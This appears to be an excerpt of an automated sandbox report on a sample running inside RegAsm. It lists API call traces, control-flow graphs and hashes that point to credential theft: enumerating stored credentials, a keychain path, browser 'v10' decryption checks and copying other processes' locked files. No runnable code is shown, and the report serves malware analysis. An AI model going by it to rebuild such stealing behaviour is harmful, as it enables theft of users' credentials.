                                                                                    • Part of subcall function 0041352F: GetModuleHandleW.KERNEL32(ntdll.dll,-00000108,0040DE02,?,000000FF,00000000,00000104), ref: 00413542
                                                                                    • Part of subcall function 0041352F: GetProcAddress.KERNEL32(00000000,NtQuerySystemInformation), ref: 00413559
                                                                                    • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtLoadDriver), ref: 0041356B
                                                                                    • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtUnloadDriver), ref: 0041357D
                                                                                    • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtOpenSymbolicLinkObject), ref: 0041358F
                                                                                    • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtQuerySymbolicLinkObject), ref: 004135A1
                                                                                    • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtQueryObject), ref: 004135B3
                                                                                    • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtSuspendProcess), ref: 004135C5
                                                                                    • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtResumeProcess), ref: 004135D7
                                                                                  • NtQuerySystemInformation.NTDLL(00000010,00000104,00001000,00000000,?,000000FF,00000000,00000104), ref: 0040DE15
                                                                                  • CloseHandle.KERNELBASE(C0000004,?,000000FF,00000000,00000104), ref: 0040DE3E
                                                                                  • GetCurrentProcessId.KERNEL32(?,000000FF,00000000,00000104), ref: 0040DE49
                                                                                  • _wcsicmp.MSVCRT ref: 0040DEB2
                                                                                  • _wcsicmp.MSVCRT ref: 0040DEC5
                                                                                  • _wcsicmp.MSVCRT ref: 0040DED8
                                                                                  • OpenProcess.KERNEL32(00000040,00000000,00000000,00000000,?,000000FF,00000000,00000104), ref: 0040DEEC
                                                                                  • GetCurrentProcess.KERNEL32(C0000004,80000000,00000000,00000002,?,000000FF,00000000,00000104), ref: 0040DF32
                                                                                  • DuplicateHandle.KERNELBASE(00000104,?,00000000,?,000000FF,00000000,00000104), ref: 0040DF41
                                                                                  • memset.MSVCRT ref: 0040DF5F
                                                                                  • CloseHandle.KERNEL32(C0000004,?,?,?,?,000000FF,00000000,00000104), ref: 0040DF92
                                                                                  • _wcsicmp.MSVCRT ref: 0040DFB2
                                                                                  • CloseHandle.KERNEL32(00000104,?,000000FF,00000000,00000104), ref: 0040DFF2
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000D.00000002.2590492024.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                  Similarity
                                                                                  • API ID: AddressProc$Handle$_wcsicmp$CloseProcess$CurrentFileModulememset$??2@CreateDuplicateInformationNameOpenQuerySystem
                                                                                  • String ID: dllhost.exe$taskhost.exe$taskhostex.exe
                                                                                  • API String ID: 708747863-3398334509
                                                                                  • Opcode ID: c0cdbd66bb0eb3cac082432fda8d0328b9155cc6ebf5e989b7bcc70ed293d7d6
                                                                                  • Instruction ID: 75e999e9478e2cd8c236028a88c267773407d5e0538ee9298daa3020847ac7a6
                                                                                  • Opcode Fuzzy Hash: c0cdbd66bb0eb3cac082432fda8d0328b9155cc6ebf5e989b7bcc70ed293d7d6
                                                                                  • Instruction Fuzzy Hash: 57818F71D00209AFEB10EF95CC81AAEBBB5FF04345F20407AF915B6291DB399E95CB58
                                                                                  APIs
                                                                                    • Part of subcall function 00418680: GetFullPathNameW.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,?,00000000), ref: 004186AC
                                                                                    • Part of subcall function 00418680: malloc.MSVCRT ref: 004186B7
                                                                                    • Part of subcall function 00418680: free.MSVCRT ref: 004186C7
                                                                                    • Part of subcall function 0041739B: GetVersionExW.KERNEL32(?), ref: 004173BE
                                                                                  • GetDiskFreeSpaceW.KERNELBASE(00000000,?,00000200,?,?,?,00000000,?,00000000), ref: 004187D2
                                                                                  • GetDiskFreeSpaceA.KERNEL32(00000000,?,00000200,?,?,?,00000000,?,00000000), ref: 004187FA
                                                                                  • free.MSVCRT ref: 00418803
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000D.00000002.2590492024.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                  Similarity
                                                                                  • API ID: DiskFreeSpacefree$FullNamePathVersionmalloc
                                                                                  • String ID:
                                                                                  • API String ID: 1355100292-0
                                                                                  • Opcode ID: 7494654f5416982ac8b8eb6095e1b911d56786f256e13b4958c27deb7a97d588
                                                                                  • Instruction ID: 9f5aa8738ec5ca8fa6c7af21032fcab0d24b7c3e7281463e4f88d86f77cdc7da
                                                                                  • Opcode Fuzzy Hash: 7494654f5416982ac8b8eb6095e1b911d56786f256e13b4958c27deb7a97d588
                                                                                  • Instruction Fuzzy Hash: 2A218776904118AEEB11EBA4CC849EF77BCEF05704F2404AFE551D7181EB784EC58769
                                                                                  APIs
                                                                                  • FindFirstFileW.KERNELBASE(?,?,?,00000000,00445F58,*.*,?,00000000,?,00000104,?,?,?,?,?,00000104), ref: 0040AE67
                                                                                  • FindNextFileW.KERNELBASE(?,?,?,00000000,00445F58,*.*,?,00000000,?,00000104,?,?,?,?,?,00000104), ref: 0040AE83
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000D.00000002.2590492024.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                  Similarity
                                                                                  • API ID: FileFind$FirstNext
                                                                                  • String ID:
                                                                                  • API String ID: 1690352074-0
                                                                                  • Opcode ID: 561b3503b5d493cb0f99635c99673ff26dffc0bbfdea02a94e907e6f5a7ee62d
                                                                                  • Instruction ID: bc213c2af839868520f9a45b85e911a0cf9bcc257b6b56acf9ba21b23a9e6198
                                                                                  • Opcode Fuzzy Hash: 561b3503b5d493cb0f99635c99673ff26dffc0bbfdea02a94e907e6f5a7ee62d
                                                                                  • Instruction Fuzzy Hash: 34F0C877040B005BD761C774D8489C733D89F84320B20063EF56AD32C0EB3899098755
                                                                                  APIs
                                                                                  • memset.MSVCRT ref: 0041898C
                                                                                  • GetSystemInfo.KERNELBASE(004725C0,?,00000000,004439D6,?,00445FAE,?,?,?,?,?,?), ref: 00418995
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000D.00000002.2590492024.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                  Similarity
                                                                                  • API ID: InfoSystemmemset
                                                                                  • String ID:
                                                                                  • API String ID: 3558857096-0
                                                                                  • Opcode ID: d0407614e71e7ae135e22cefa727abc0102cb379ef2ade91b8070469c4ed11d1
                                                                                  • Instruction ID: bf8bfd662ffca2911032058da6995c9eeb4a28626cb6ee34ade21af96d3a2c90
                                                                                  • Opcode Fuzzy Hash: d0407614e71e7ae135e22cefa727abc0102cb379ef2ade91b8070469c4ed11d1
                                                                                  • Instruction Fuzzy Hash: C0E06531A0163097F22077766C067DF25949F41395F04407BB9049A186EBAC4D8546DE

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 0 44553b-445558 call 44db70 3 445599-4455a2 0->3 4 44555a-44557c call 40c768 call 40bdb0 call 4135f7 0->4 5 4455a8-4455e3 memset call 403988 wcsrchr 3->5 6 4457fb 3->6 42 44558e-445594 call 444b06 4->42 43 44557e-44558c call 4136c0 call 41366b 4->43 15 4455e5 5->15 16 4455e8-4455f9 5->16 10 445800-445809 6->10 13 445856-44585f 10->13 14 44580b-44581e call 40a889 call 403e2d 10->14 18 445861-445874 call 40a889 call 403c9c 13->18 19 4458ac-4458b5 13->19 45 445823-445826 14->45 15->16 21 445672-445683 call 40a889 call 403fbe 16->21 22 4455fb-445601 16->22 53 445879-44587c 18->53 23 44594f-445958 19->23 24 4458bb-44592b memset * 2 call 414c2e call 40b2cc call 409d1f call 409b98 19->24 87 445685 21->87 88 4456b2-4456b5 call 40b1ab 21->88 30 445605-445607 22->30 31 445603 22->31 28 4459f2-4459fa 23->28 29 44595e-4459ce memset * 2 call 414c2e call 40b2cc call 409d1f call 409b98 23->29 139 44592d-445945 call 40b6ef 24->139 140 44594a 24->140 37 445a00-445aa1 memset * 2 call 414c2e call 40b2cc call 409d1f call 40b2cc call 40ae18 28->37 38 445b29-445b32 28->38 157 4459d0-4459e8 call 40b6ef 29->157 158 4459ed 29->158 30->21 41 445609-44560d 30->41 31->30 182 445b08-445b15 call 40ae51 37->182 54 445c7c-445c85 38->54 55 445b38-445b96 memset * 3 38->55 41->21 51 44560f-445641 call 4087b3 call 40a889 call 4454bf 41->51 42->3 43->42 56 44584c-445854 call 40b1ab 45->56 57 445828 45->57 154 445665-445670 call 40b1ab 51->154 155 445643-445663 call 40a9b5 call 4087b3 51->155 67 4458a2-4458aa call 40b1ab 53->67 68 44587e 53->68 63 445d1c-445d25 54->63 64 445c8b-445cf3 memset * 2 call 414c2e call 409d1f call 409b98 54->64 69 445bd4-445c72 call 414c2e call 40b2cc call 409d1f call 445389 call 40b2cc call 409d1f call 445389 call 40b2cc call 409d1f call 445389 55->69 70 445b98-445ba0 55->70 56->13 71 44582e-445847 call 40a9b5 call 4087b3 57->71 76 445fae-445fb2 63->76 77 445d2b-445d3b 63->77 159 445cf5 64->159 160 445cfc-445d03 64->160 67->19 85 445884-44589d call 40a9b5 call 4087b3 68->85 249 445c77 69->249 70->69 86 445ba2-445bcf call 4099c6 call 445403 call 445389 70->86 142 445849 71->142 94 445d3d-445d65 call 409c52 call 40b2cc _wcsicmp 77->94 95 445d88-445e15 memset * 3 call 414c2e call 40b2cc call 409d1f call 409b98 77->95 146 44589f 85->146 86->54 89 44568b-4456a4 call 40a9b5 call 4087b3 87->89 107 4456ba-4456c4 88->107 148 4456a9-4456b0 89->148 165 445d67-445d6c 94->165 166 445d71-445d83 call 445093 94->166 196 445e17 95->196 197 445e1e-445e25 95->197 121 4457f9 107->121 122 4456ca-4456d3 call 413cfa call 413d4c 107->122 121->6 174 4456d8-4456f7 call 40b2cc call 413fa6 122->174 139->140 140->23 142->56 146->67 148->88 148->89 154->107 155->154 157->158 158->28 159->160 171 445d05-445d13 160->171 172 445d17 160->172 176 445fa1-445fa9 call 40b6ef 165->176 166->76 171->172 172->63 206 4456fd-445796 memset * 4 call 409c70 * 3 174->206 207 4457ea-4457f7 call 413d29 174->207 176->76 200 445b17-445b27 call 40aebe 182->200 201 445aa3-445ab0 call 40add4 182->201 196->197 202 445e27-445e59 call 40b2cc call 409d1f call 409b98 197->202 203 445e6b-445e7e call 445093 197->203 200->38 201->182 221 445ab2-445b03 memset call 40b2cc call 409d1f call 445389 201->221 239 445e62-445e69 202->239 240 445e5b 202->240 220 445f67-445f99 call 40b2cc call 409d1f call 409b98 203->220 206->207 248 445798-4457ca call 40b2cc call 409d1f call 409b98 206->248 207->10 220->76 253 445f9b 220->253 221->182 239->203 245 445e83-445ef5 memset call 40b2cc call 409d1f call 40ae18 239->245 240->239 264 445f4d-445f5a call 40ae51 245->264 248->207 265 4457cc-4457e5 call 4087b3 248->265 249->54 253->176 269 445ef7-445f04 call 40add4 264->269 270 445f5c-445f62 call 40aebe 264->270 265->207 269->264 274 445f06-445f38 call 40b2cc call 409d1f call 409b98 269->274 270->220 274->264 281 445f3a-445f48 call 445093 274->281 281->264
                                                                                  APIs
                                                                                  • memset.MSVCRT ref: 004455C2
                                                                                  • wcsrchr.MSVCRT ref: 004455DA
                                                                                  • memset.MSVCRT ref: 0044570D
                                                                                  • memset.MSVCRT ref: 00445725
                                                                                    • Part of subcall function 0040C768: _wcslwr.MSVCRT ref: 0040C817
                                                                                    • Part of subcall function 0040C768: wcslen.MSVCRT ref: 0040C82C
                                                                                    • Part of subcall function 0040BDB0: CredEnumerateW.SECHOST(00000000,00000000,?,?,?,00000000,?), ref: 0040BDE9
                                                                                    • Part of subcall function 0040BDB0: wcslen.MSVCRT ref: 0040BE06
                                                                                    • Part of subcall function 0040BDB0: wcsncmp.MSVCRT ref: 0040BE38
                                                                                    • Part of subcall function 0040BDB0: memset.MSVCRT ref: 0040BE91
                                                                                    • Part of subcall function 0040BDB0: memcpy.MSVCRT(?,?,?,00000001,?,?,?,00000000,?), ref: 0040BEB2
                                                                                    • Part of subcall function 004135F7: GetProcAddress.KERNEL32(?,00000000), ref: 0041362A
                                                                                  • memset.MSVCRT ref: 0044573D
                                                                                  • memset.MSVCRT ref: 00445755
                                                                                  • memset.MSVCRT ref: 004458CB
                                                                                  • memset.MSVCRT ref: 004458E3
                                                                                  • memset.MSVCRT ref: 0044596E
                                                                                  • memset.MSVCRT ref: 00445A10
                                                                                  • memset.MSVCRT ref: 00445A28
                                                                                  • memset.MSVCRT ref: 00445AC6
                                                                                    • Part of subcall function 00445093: GetFileSize.KERNEL32(00000000,00000000,?,00000000,00000104,00445E7E,?,?,?,?,00000104), ref: 004450AA
                                                                                    • Part of subcall function 00445093: ??2@YAPAXI@Z.MSVCRT(0000000A,?,?,00000104), ref: 004450BE
                                                                                    • Part of subcall function 00445093: memset.MSVCRT ref: 004450CD
                                                                                    • Part of subcall function 00445093: ??3@YAXPAX@Z.MSVCRT(00000000,?,?,?,?,?,?,?,?,00000104), ref: 004450F0
                                                                                    • Part of subcall function 00445093: CloseHandle.KERNEL32(00000000,?,?,00000104), ref: 004450F7
                                                                                  • memset.MSVCRT ref: 00445B52
                                                                                  • memset.MSVCRT ref: 00445B6A
                                                                                  • memset.MSVCRT ref: 00445C9B
                                                                                  • memset.MSVCRT ref: 00445CB3
                                                                                  • _wcsicmp.MSVCRT ref: 00445D56
                                                                                  • memset.MSVCRT ref: 00445B82
                                                                                    • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B71C
                                                                                    • Part of subcall function 0040B6EF: wcsrchr.MSVCRT ref: 0040B738
                                                                                    • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B756
                                                                                    • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B7F5
                                                                                    • Part of subcall function 0040B6EF: CreateFileW.KERNELBASE(00445FAE,80000000,00000000,00000000,00000003,00000000,00000000,?,?), ref: 0040B80C
                                                                                    • Part of subcall function 0040ADD4: wcscmp.MSVCRT ref: 0040ADF3
                                                                                    • Part of subcall function 0040ADD4: wcscmp.MSVCRT ref: 0040AE04
                                                                                  • memset.MSVCRT ref: 00445986
                                                                                    • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                    • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                    • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                    • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                    • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000D.00000002.2590492024.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                  Similarity
                                                                                  • API ID: memset$wcslen$File$wcscmpwcsrchr$??2@??3@AddressAttributesCloseCreateCredEnumerateHandleProcSize_wcsicmp_wcslwrmemcpywcscatwcscpywcsncmp
                                                                                  • String ID: *.*$Apple Computer\Preferences\keychain.plist
                                                                                  • API String ID: 2263259095-3798722523
                                                                                  • Opcode ID: 60142fc224ce82f33f024026baff3817031bc91c0ca8ee6e0e9eeeaa230f4715
                                                                                  • Instruction ID: 0d822d17a5609fa1e1b699618fc72e24fb48bc28b5d87ede4d5502c71e25afa2
                                                                                  • Opcode Fuzzy Hash: 60142fc224ce82f33f024026baff3817031bc91c0ca8ee6e0e9eeeaa230f4715
                                                                                  • Instruction Fuzzy Hash: ED4278B29005196BEB10E761DD46EDFB37CEF45358F1001ABF508A2193EB385E948B9A

                                                                                  Control-flow Graph

                                                                                  APIs
                                                                                    • Part of subcall function 004044A4: LoadLibraryW.KERNEL32(comctl32.dll), ref: 004044C3
                                                                                    • Part of subcall function 004044A4: GetProcAddress.KERNEL32(00000000,InitCommonControlsEx), ref: 004044D5
                                                                                    • Part of subcall function 004044A4: FreeLibrary.KERNEL32(00000000), ref: 004044E9
                                                                                    • Part of subcall function 004044A4: MessageBoxW.USER32(00000001,Error: Cannot load the common control classes.,Error,00000030), ref: 00404514
                                                                                  • SetErrorMode.KERNELBASE(00008001), ref: 00412799
                                                                                  • GetModuleHandleW.KERNEL32(00000000,0041493C,00000000), ref: 004127B2
                                                                                  • EnumResourceTypesW.KERNEL32(00000000), ref: 004127B9
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000D.00000002.2590492024.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                  Similarity
                                                                                  • API ID: Library$AddressEnumErrorFreeHandleLoadMessageModeModuleProcResourceTypes
                                                                                  • String ID: $/deleteregkey$/savelangfile
                                                                                  • API String ID: 2744995895-28296030
                                                                                  • Opcode ID: 72338f9f39f0fed86814d702f01b1d2779e3084bd08ead6f54537fd18a2fe269
                                                                                  • Instruction ID: bb1d383b9f388563dc7403a66819e695bb2bbb53a4e653fbe84b6d7681309d95
                                                                                  • Opcode Fuzzy Hash: 72338f9f39f0fed86814d702f01b1d2779e3084bd08ead6f54537fd18a2fe269
                                                                                  • Instruction Fuzzy Hash: FC51BEB1608346ABD710AFA6DD88A9F77ECFF81304F40092EF644D2161D778E8558B2A

                                                                                  Control-flow Graph

                                                                                  APIs
                                                                                  • memset.MSVCRT ref: 0040B71C
                                                                                    • Part of subcall function 00409C70: wcscpy.MSVCRT ref: 00409C75
                                                                                    • Part of subcall function 00409C70: wcsrchr.MSVCRT ref: 00409C7D
                                                                                  • wcsrchr.MSVCRT ref: 0040B738
                                                                                  • memset.MSVCRT ref: 0040B756
                                                                                  • memset.MSVCRT ref: 0040B7F5
                                                                                  • CreateFileW.KERNELBASE(00445FAE,80000000,00000000,00000000,00000003,00000000,00000000,?,?), ref: 0040B80C
                                                                                  • CloseHandle.KERNELBASE(00000000,?,?), ref: 0040B838
                                                                                  • memset.MSVCRT ref: 0040B851
                                                                                  • memset.MSVCRT ref: 0040B8CA
                                                                                  • memcmp.MSVCRT(?,v10,00000003), ref: 0040B9BF
                                                                                    • Part of subcall function 00404423: GetProcAddress.KERNEL32(?,00000000), ref: 00404453
                                                                                    • Part of subcall function 00404423: FreeLibrary.KERNEL32(00000000,00000141,?,00000000,?,004026E9,?,?,00000000,?), ref: 00404476
                                                                                  • memset.MSVCRT ref: 0040BB53
                                                                                  • memcpy.MSVCRT(?,00000000,?,00000000,00000000,?), ref: 0040BB66
                                                                                  • LocalFree.KERNEL32(00000000,?,?,?,00000000,00000000,?), ref: 0040BB8D
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000D.00000002.2590492024.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                  Similarity
                                                                                  • API ID: memset$Freewcsrchr$AddressCloseCreateFileHandleLibraryLocalProcmemcmpmemcpywcscpy
                                                                                  • String ID: chp$v10
                                                                                  • API String ID: 4290143792-2783969131
                                                                                  • Opcode ID: aa7ff03ddb8a60b54c19e14ecab6b10a2ad5bd81823861da0c4d13f19dc0bdfc
                                                                                  • Instruction ID: 8b5aa87907ec6e815121f1c024adfc7170cbdef62e19f7af032d1a0a82a34a86
                                                                                  • Opcode Fuzzy Hash: aa7ff03ddb8a60b54c19e14ecab6b10a2ad5bd81823861da0c4d13f19dc0bdfc
                                                                                  • Instruction Fuzzy Hash: 32D17372900218AFEB11EB95DC41EEE77B8EF44304F1044BAF509B7191DB789F858B99

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 505 4091b8-40921b memset call 40a6e6 call 444432 510 409520-409526 505->510 511 409221-40923b call 40b273 call 438552 505->511 515 409240-409248 511->515 516 409383-4093ab call 40b273 call 438552 515->516 517 40924e-409258 call 4251c4 515->517 529 4093b1 516->529 530 4094ff-40950b call 443d90 516->530 522 40937b-40937e call 424f26 517->522 523 40925e-409291 call 4253cf * 2 call 4253af * 2 517->523 522->516 523->522 553 409297-409299 523->553 531 4093d3-4093dd call 4251c4 529->531 530->510 539 40950d-409511 530->539 540 4093b3-4093cc call 4253cf * 2 531->540 541 4093df 531->541 539->510 543 409513-40951d call 408f2f 539->543 540->531 557 4093ce-4093d1 540->557 545 4094f7-4094fa call 424f26 541->545 543->510 545->530 553->522 555 40929f-4092a3 553->555 555->522 556 4092a9-4092ba 555->556 558 4092bc 556->558 559 4092be-4092e3 memcpy memcmp 556->559 557->531 560 4093e4-4093fb call 4253af * 2 557->560 558->559 561 409333-409345 memcmp 559->561 562 4092e5-4092ec 559->562 560->545 570 409401-409403 560->570 561->522 565 409347-40935f memcpy 561->565 562->522 564 4092f2-409331 memcpy * 2 562->564 567 409363-409378 memcpy 564->567 565->567 567->522 570->545 571 409409-40941b memcmp 570->571 571->545 572 409421-409433 memcmp 571->572 573 4094a4-4094b6 memcmp 572->573 574 409435-40943c 572->574 573->545 576 4094b8-4094ed memcpy * 2 573->576 574->545 575 409442-4094a2 memcpy * 3 574->575 577 4094f4 575->577 576->577 577->545
                                                                                  APIs
                                                                                  • memset.MSVCRT ref: 004091E2
                                                                                    • Part of subcall function 0040A6E6: WideCharToMultiByte.KERNEL32(0000FDE9,00000000,000003FF,000000FF,00000000,000003FF,00000000,00000000,0040B866,00445FAE,?,?,?,?,?,?), ref: 0040A6FF
                                                                                  • memcpy.MSVCRT(?,00000000,?,?,?,?,?,?,?,?,?,?,00000143,00000000), ref: 004092C9
                                                                                  • memcmp.MSVCRT(00000000,0045A4F0,00000006,?,?,?,?,?,?,?,?,?,?,?,?,00000143), ref: 004092D9
                                                                                  • memcpy.MSVCRT(?,00000023,?), ref: 0040930C
                                                                                  • memcpy.MSVCRT(?,?,00000010), ref: 00409325
                                                                                  • memcmp.MSVCRT(00000000,0045A4E8,00000006), ref: 0040933B
                                                                                  • memcpy.MSVCRT(?,00000015,?), ref: 00409357
                                                                                  • memcpy.MSVCRT(?,?,00000010), ref: 00409370
                                                                                  • memcmp.MSVCRT(00000000,004599B8,00000010), ref: 00409411
                                                                                  • memcmp.MSVCRT(00000000,0045A500,00000006), ref: 00409429
                                                                                  • memcpy.MSVCRT(?,00000023,?), ref: 00409462
                                                                                  • memcpy.MSVCRT(?,?,00000010), ref: 0040947E
                                                                                  • memcpy.MSVCRT(?,?,00000020), ref: 0040949A
                                                                                  • memcmp.MSVCRT(00000000,0045A4F8,00000006), ref: 004094AC
                                                                                  • memcpy.MSVCRT(?,00000015,?), ref: 004094D0
                                                                                  • memcpy.MSVCRT(?,?,00000020), ref: 004094E8
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000D.00000002.2590492024.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                  Similarity
                                                                                  • API ID: memcpy$memcmp$ByteCharMultiWidememset
                                                                                  • String ID:
                                                                                  • API String ID: 3715365532-3916222277
                                                                                  • Opcode ID: 84d8fa7e2563b014b86416b64341180d82413736d9254b8658418cb4f91a0b1c
                                                                                  • Instruction ID: d5c0d9b4f94ac501fd0f2fb5594fd033b2d13f4c98b4255323c8c53c7695c3f7
                                                                                  • Opcode Fuzzy Hash: 84d8fa7e2563b014b86416b64341180d82413736d9254b8658418cb4f91a0b1c
                                                                                  • Instruction Fuzzy Hash: DDA1BA71900605ABDB21EF65D885BAFB7BCAF44304F01043FF945E6282EB78EA458B59

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 578 413d4c-413da0 call 40b633 CreateToolhelp32Snapshot memset Process32FirstW 581 413f00-413f11 Process32NextW 578->581 582 413da5-413ded OpenProcess 581->582 583 413f17-413f24 CloseHandle 581->583 584 413eb0-413eb5 582->584 585 413df3-413e26 memset call 413f27 582->585 584->581 586 413eb7-413ebd 584->586 593 413e79-413e9d call 413959 call 413ca4 585->593 594 413e28-413e35 585->594 588 413ec8-413eda call 4099f4 586->588 589 413ebf-413ec6 free 586->589 591 413edb-413ee2 588->591 589->591 599 413ee4 591->599 600 413ee7-413efe 591->600 605 413ea2-413eae CloseHandle 593->605 597 413e61-413e68 594->597 598 413e37-413e44 GetModuleHandleW 594->598 597->593 601 413e6a-413e76 597->601 598->597 603 413e46-413e5c GetProcAddress 598->603 599->600 600->581 601->593 603->597 605->584
                                                                                  APIs
                                                                                    • Part of subcall function 0040B633: free.MSVCRT ref: 0040B63A
                                                                                  • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?,?,?), ref: 00413D6A
                                                                                  • memset.MSVCRT ref: 00413D7F
                                                                                  • Process32FirstW.KERNEL32(00000000,?), ref: 00413D9B
                                                                                  • OpenProcess.KERNEL32(00000410,00000000,?,?,?,?), ref: 00413DE0
                                                                                  • memset.MSVCRT ref: 00413E07
                                                                                  • GetModuleHandleW.KERNEL32(kernel32.dll,00000000,?), ref: 00413E3C
                                                                                  • GetProcAddress.KERNEL32(00000000,QueryFullProcessImageNameW), ref: 00413E56
                                                                                  • CloseHandle.KERNEL32(?,?,?,?,00000000,?), ref: 00413EA8
                                                                                  • free.MSVCRT ref: 00413EC1
                                                                                  • Process32NextW.KERNEL32(00000000,0000022C), ref: 00413F0A
                                                                                  • CloseHandle.KERNEL32(00000000,00000000,0000022C), ref: 00413F1A
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000D.00000002.2590492024.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                  Similarity
                                                                                  • API ID: Handle$CloseProcess32freememset$AddressCreateFirstModuleNextOpenProcProcessSnapshotToolhelp32
                                                                                  • String ID: QueryFullProcessImageNameW$kernel32.dll
                                                                                  • API String ID: 1344430650-1740548384
                                                                                  • Opcode ID: d01459b62e4562fe598c3dda65fe2a12e31c3c57d7bea03f0a3dc75513a8eb61
                                                                                  • Instruction ID: a891ebf292d3308fa7e32b9fbc5d589fb36fb38cf1b6cbdc37d41f3709903cdc
                                                                                  • Opcode Fuzzy Hash: d01459b62e4562fe598c3dda65fe2a12e31c3c57d7bea03f0a3dc75513a8eb61
                                                                                  • Instruction Fuzzy Hash: B4518FB2C00218ABDB10DF5ACC84ADEF7B9AF95305F1041ABE509A3251D7795F84CFA9

                                                                                  Control-flow Graph

                                                                                  APIs
                                                                                    • Part of subcall function 0040DD85: memset.MSVCRT ref: 0040DDAD
                                                                                    • Part of subcall function 0040DD85: CreateFileW.KERNELBASE(?,80000000,00000003,00000000,00000003,00000000,00000000,?,000000FF,00000000,00000104), ref: 0040DDD4
                                                                                    • Part of subcall function 0040DD85: NtQuerySystemInformation.NTDLL(00000010,00000104,00001000,00000000,?,000000FF,00000000,00000104), ref: 0040DE15
                                                                                    • Part of subcall function 0040DD85: CloseHandle.KERNELBASE(C0000004,?,000000FF,00000000,00000104), ref: 0040DE3E
                                                                                    • Part of subcall function 0040DD85: GetCurrentProcessId.KERNEL32(?,000000FF,00000000,00000104), ref: 0040DE49
                                                                                    • Part of subcall function 0040DD85: _wcsicmp.MSVCRT ref: 0040DEB2
                                                                                    • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT(00000001,00000001,00401E7F), ref: 0040AFD8
                                                                                  • OpenProcess.KERNEL32(00000040,00000000,00000000,00000104,?,00000000,00000104,?,00000000,00000104,00000000), ref: 0040E093
                                                                                  • GetCurrentProcess.KERNEL32(?,80000000,00000000,00000000), ref: 0040E0B2
                                                                                  • DuplicateHandle.KERNELBASE(?,00000104,00000000), ref: 0040E0BF
                                                                                  • GetFileSize.KERNEL32(?,00000000), ref: 0040E0D4
                                                                                    • Part of subcall function 00409A45: GetTempPathW.KERNEL32(00000104,?,00445FAE), ref: 00409A5C
                                                                                    • Part of subcall function 00409A45: GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 00409A6E
                                                                                    • Part of subcall function 00409A45: GetTempFileNameW.KERNELBASE(?,0040B827,00000000,?), ref: 00409A85
                                                                                    • Part of subcall function 004096DC: CreateFileW.KERNELBASE(00000001,40000000,00000001,00000000,00000002,00000000,00000000,0040E0F1,00000104), ref: 004096EE
                                                                                  • CreateFileMappingW.KERNELBASE(?,00000000,00000002,00000000,00000000,00000000), ref: 0040E0FE
                                                                                  • MapViewOfFile.KERNELBASE(00000000,00000004,00000000,00000000,00000104), ref: 0040E113
                                                                                  • WriteFile.KERNELBASE(00000000,00000000,00000104,0040E6A3,00000000), ref: 0040E12E
                                                                                  • UnmapViewOfFile.KERNEL32(00000000), ref: 0040E135
                                                                                  • CloseHandle.KERNELBASE(?), ref: 0040E13E
